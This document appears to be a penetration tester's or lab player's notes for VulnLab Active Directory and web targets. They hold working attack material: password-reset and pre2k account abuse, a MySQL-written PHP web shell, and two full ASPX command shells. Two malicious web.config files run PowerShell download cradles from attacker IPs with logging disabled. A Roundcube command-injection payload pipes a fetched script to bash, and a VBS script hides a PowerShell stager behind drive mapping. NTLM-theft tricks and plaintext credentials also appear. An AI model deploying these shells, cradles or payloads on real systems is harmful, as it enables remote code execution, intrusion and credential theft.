Insecure credentials

STATUS_PASSWORD_MUST_CHANGE (the password is valid but expired: set a new one with either tool below, then authenticate normally; note the old value first, since resetting it is noisy and locks the real user out until it is restored)

smbpasswd.py -newpass Password123! caroline.robinson@10.10.127.198
changepasswd.py 'caroline.robinson:BabyStart123!'@10.10.66.196 -newpass 'Password123!'

Pre-Windows 2000 machine accounts (password equals the lowercase computer name without the trailing $; pre2k tests this, and the kpasswd example below uses it)

pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl

krb5.conf

kpasswd banking$
banking

MySQL root access + phpinfo (to locate the webroot) to write shell.php with SELECT ... INTO OUTFILE

mysql -h 10.10.244.198 -u root -p
select '<?php echo "command: " . system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";

ASPX web shell (awen): the command is sent by POST and the output is HTML-encoded before being written to the page

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
// Nothing to do on load; all work happens in the Click handler.
void Page_Load(object sender, EventArgs e) { }
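// Runs `cmd.exe /c <arg>` and returns what the command wrote to stdout
// followed by stderr. The caller (Click) HTML-encodes the result.
//
// Fixes versus the original: the Process was never disposed (a handle leak
// per request in the long-lived worker process), it was never waited on,
// and stderr was discarded so a failing command came back as an empty string.
string test(string arg)
{
    if (string.IsNullOrWhiteSpace(arg))
    {
        return string.Empty;
    }

    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "cmd.exe";
    psi.Arguments = "/c " + arg;
    psi.UseShellExecute = false;      // required for stream redirection
    psi.CreateNoWindow = true;
    psi.RedirectStandardOutput = true;
    psi.RedirectStandardError = true;

    using (Process p = Process.Start(psi))
    {
        if (p == null)
        {
            return string.Empty;
        }

        // Drain stderr asynchronously so a chatty command cannot block on a
        // full pipe while stdout is read synchronously to the end.
        System.Text.StringBuilder errors = new System.Text.StringBuilder();
        p.ErrorDataReceived += (s, ev) => { if (ev.Data != null) errors.AppendLine(ev.Data); };
        p.BeginErrorReadLine();

        string output = p.StandardOutput.ReadToEnd();
        p.WaitForExit();   // also guarantees all ErrorDataReceived events fired
        return output + errors.ToString();
    }
}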
// Button handler: runs the typed command and writes its output inside a
// <pre> block. The output is HTML-encoded so command output cannot inject
// markup or script into the page.
void Click(object sender, System.EventArgs e)
{
    string result = test(txtArg.Text);
    string encoded = Server.HtmlEncode(result);
    Response.Write("<pre>" + encoded + "</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"

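<div class="post page-global">
  <h2 class="page-global-title">Command Shell</h2>
  <%-- Server-side comment, not rendered. This form uses GET, so every
       command lands in the query string and therefore in IIS/proxy logs
       and browser history; the awen shell in these notes uses POST. --%>
  <form method="get" action="">
    <input type="text" name="cmd" placeholder="Enter command" />
    <input type="submit" value="Execute" />
  </form>
  <pre>
<%
    // Run `cmd.exe /c <cmd>` and echo stdout followed by stderr into the <pre>.
    string cmd = Request.QueryString["cmd"];
    if (!string.IsNullOrEmpty(cmd))
    {
        System.Diagnostics.ProcessStartInfo psi = new System.Diagnostics.ProcessStartInfo();
        psi.FileName = "cmd.exe";
        psi.Arguments = "/c " + cmd;
        psi.UseShellExecute = false;      // required for stream redirection
        psi.CreateNoWindow = true;
        psi.RedirectStandardOutput = true;
        psi.RedirectStandardError = true;

        // using: the original never disposed the Process (handle leak per request).
        using (System.Diagnostics.Process proc = System.Diagnostics.Process.Start(psi))
        {
            if (proc != null)
            {
                // Drain stderr asynchronously so a full pipe cannot block the
                // synchronous stdout read.
                System.Text.StringBuilder errors = new System.Text.StringBuilder();
                proc.ErrorDataReceived += (s, ev) => { if (ev.Data != null) errors.AppendLine(ev.Data); };
                proc.BeginErrorReadLine();

                string output = proc.StandardOutput.ReadToEnd();
                proc.WaitForExit();

                // HTML-encode like the awen shell does: raw output would be
                // rendered as markup inside the <pre>.
                Response.Write(Server.HtmlEncode(output + errors.ToString()));
            }
        }
    }
%>
  </pre>
</div>
</div> </div> </div>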

SeImpersonatePrivilege abuse (Method 3: GodPotato with a donut-generated payload)

ASP.NET web.config RCE: upload a web.config that maps a URL to the ASP.NET Core Module and points processPath at an arbitrary executable; requesting the mapped URL makes the module launch it

<?xml version="1.0" encoding="utf-8"?>
<!-- Dropped web.config: maps a single URL to the ASP.NET Core Module and
     points processPath at cmd.exe. With out-of-process hosting the module
     starts processPath as the backend, so the command runs under the
     application pool identity. Requires AspNetCoreModuleV2 on the target;
     TODO confirm before dropping. -->
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <!-- Only requests for /execute.now are routed to the module. -->
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <!-- cmd.exe runs a PowerShell download cradle (amsi64.txt from the
           attacker host). The inner quotes are XML-escaped as &quot; so the
           whole IEX expression reaches PowerShell as one -Command argument.
           stdoutLogEnabled="false": the module writes nothing to .\logs\stdout. -->
      <aspNetCore processPath="cmd.exe" arguments="/c powershell.exe -Command &quot;IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')&quot;" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

<?xml version="1.0" encoding="utf-8"?>
<!-- Variant of the web.config above: same handler mapping and cmd.exe
     processPath, but the cradle's output is redirected into a file on the
     target instead of being discarded. Requires AspNetCoreModuleV2 on the
     target; TODO confirm before dropping. -->
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <!-- Only requests for /execute.now are routed to the module. -->
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <!-- The trailing "> c:\webaccounting\file.txt" is cmd.exe redirection,
           so whatever large.ps1 prints is written to that file. A bare ">"
           is legal inside an XML attribute value (only "<" and "&" must be
           escaped). The file is left on disk: clean it up afterwards. -->
      <aspNetCore processPath="cmd.exe" arguments="/c powershell.exe -Command &quot;IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/large.ps1')&quot; > c:\webaccounting\file.txt" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Roundcube “markasjunk” plugin: authenticated command injection via the sender address

  • Authenticate
  • Resource Dev from Challenge 6 linux
  • Send mail to yourself with the sender address set to the payload below, then mark the message as junk so the plugin processes it
peter.turner&curl${IFS}10.8.2.41/bad.sh${IFS}|${IFS}bash&@hybrid.vl

https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FHybrid%2FWriteup

https://cyberthint.io/roundcube-markasjunk-command-injection-vulnerability/

VBS script (runs a hidden PowerShell download cradle, then maps network drives)

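' Maps sharePath to driveLetter (e.g. "V"), first disconnecting any existing
' mapping on that letter. Errors are trapped inside this Sub so one failed
' mapping does not abort the rest of the script.
Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork, mappedDrives, isMapped, i
    Set objNetwork = CreateObject("WScript.Network")

    ' Trap errors for the rest of this Sub. Without this a failed
    ' MapNetworkDrive raises a runtime error and the script terminates
    ' before the Err.Number check below is ever reached.
    On Error Resume Next

    ' EnumNetworkDrives returns alternating (drive letter, UNC path) entries,
    ' so step by 2 to look only at the letters.
    isMapped = False
    Set mappedDrives = objNetwork.EnumNetworkDrives
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next

    ' Force-disconnect and drop the persistent mapping before remapping.
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If

    ' Clear any earlier trapped error so the check below reflects only
    ' the MapNetworkDrive call.
    Err.Clear
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath

    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If

    On Error GoTo 0
    Set objNetwork = Nothing
End Sub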

' Launches a PowerShell download cradle with no profile, a hidden window and
' the execution policy bypassed, and returns immediately without waiting.
Sub ExecutePowerShellScript()
    Dim wsh
    Set wsh = CreateObject("WScript.Shell")
    ' Run(cmd, windowStyle, waitOnReturn): 0 = hidden window, False = do not wait
    wsh.Run "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.41/large1.ps1')", 0, False
    Set wsh = Nothing
End Sub

' Entry point: start the PowerShell stager first (it does not block), then
' map the three shares; the third one points at the attacker host.
Call ExecutePowerShellScript

Call MapNetworkShare("\\dc.baby2.vl\apps", "V")
Call MapNetworkShare("\\dc.baby2.vl\docs", "L")
Call MapNetworkShare("\\10.8.2.41\docs", "Z")


NTLM Theft

Write Access on SMB share

NTLM theft by uploading files to the writable share: the files reference an attacker-controlled UNC path, so a user browsing the share authenticates to the attacker host and leaks a Net-NTLM hash

Media player file upload

NTLM theft after uploading a video file (presumably the media player follows a UNC reference embedded in the file and authenticates to the attacker host; confirm with the capture listener running).

JEA (Just Enough Administration) shell: a constrained PowerShell endpoint that exposes only a whitelisted set of commands

evil-jea connect adfs_svc 'S3cur!ty' 192.168.20.15

Theory on